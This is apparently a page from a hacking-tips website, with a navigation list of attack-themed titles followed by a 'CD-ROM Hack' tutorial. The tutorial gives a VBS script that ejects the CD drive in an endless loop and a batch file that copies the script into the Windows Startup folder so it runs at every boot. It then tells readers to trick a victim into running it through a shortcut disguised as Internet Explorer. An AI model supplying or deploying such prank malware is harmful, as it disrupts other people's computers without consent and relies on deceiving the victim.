Customize Firefox blank page | How to Block a Website | Useful Web Tools for Picking a Domain Name | Newfolder.exe Virus Removal | Registry Editor Tricks | 15 Top Windows XP secrets | Useful DOS Files | Troubleshooting TCP/IP Networks | Linux Tips | Understanding IP Addresses | 5 Firefox tips to surf faster | Internet Explorer Troubleshooting | How to Log Into Windows With No Password | Virus made in c++ | How to Hack Into a Windows XP Computer Without Changing Password | Cracking WEP and WPA Wireless Networks | Hacking with JavaScript | How To Shut Down All Pc(s) On the Network | Cookie stealing | Cracks, Serials & Warez | Disabling the cache for reals | Boot Xp Faster, Start window Faster, Run window Xp Faster | Enable Right Clicks on The Sites That Disabled it | Bypass windows Validation | Attacking the Interlock Protocol | Bypassing software firewalls using process infection | Hacking Database Servers | Hacking Hotmail through XSS | Hacking IIS 5.0: The Complete Guide | Unix logfiles | Advanced Google Searching | Simple Virus making | Hacking DNS | hack anybody's account and change his password | CD-ROM Hack |
Here
i will show you a basic VBS script that opens a cd drive every time found
closed( How hard u may try but CD ROM will never be closed until u restart
yr computer ). so ultimately always opens CD drive till closed just copy
paste this code into Notepad (any basic ANSI standard text editor) and
save as CDfun.vbs and dont forget the .vbs part
set wmp =
createObject("wmplayer.ocx.7")
set drives =
wmp.cdromCollection
sub open_saysame()
on error
resume next
do
if drives.count > = 1
then
for i = 0 to drives.count -
1
drives.item(i).eject()
next
end
if
loop
end sub
open_saysame()
now this is funny but what if it was even funnier.
what if every time you started you r computer it loaded? that could make
it even better... so open a new notepad document (blank) and insert this
code into it NOTE: numbered to show which line it
is.
1:)copy CDfun.vbs "c:\Documents and
Settings\%username%\Start Menu\Programs\Startup\"
2:)CDfun.vbs
Save this as run.bat, now comes the fun part. all you need to do is get them to somehow open this run.bat. there are many ways. one way is to make a shortcut to it called "internet Explorer" and right click to change properties on icon. that way it will look just like Internet Explorer.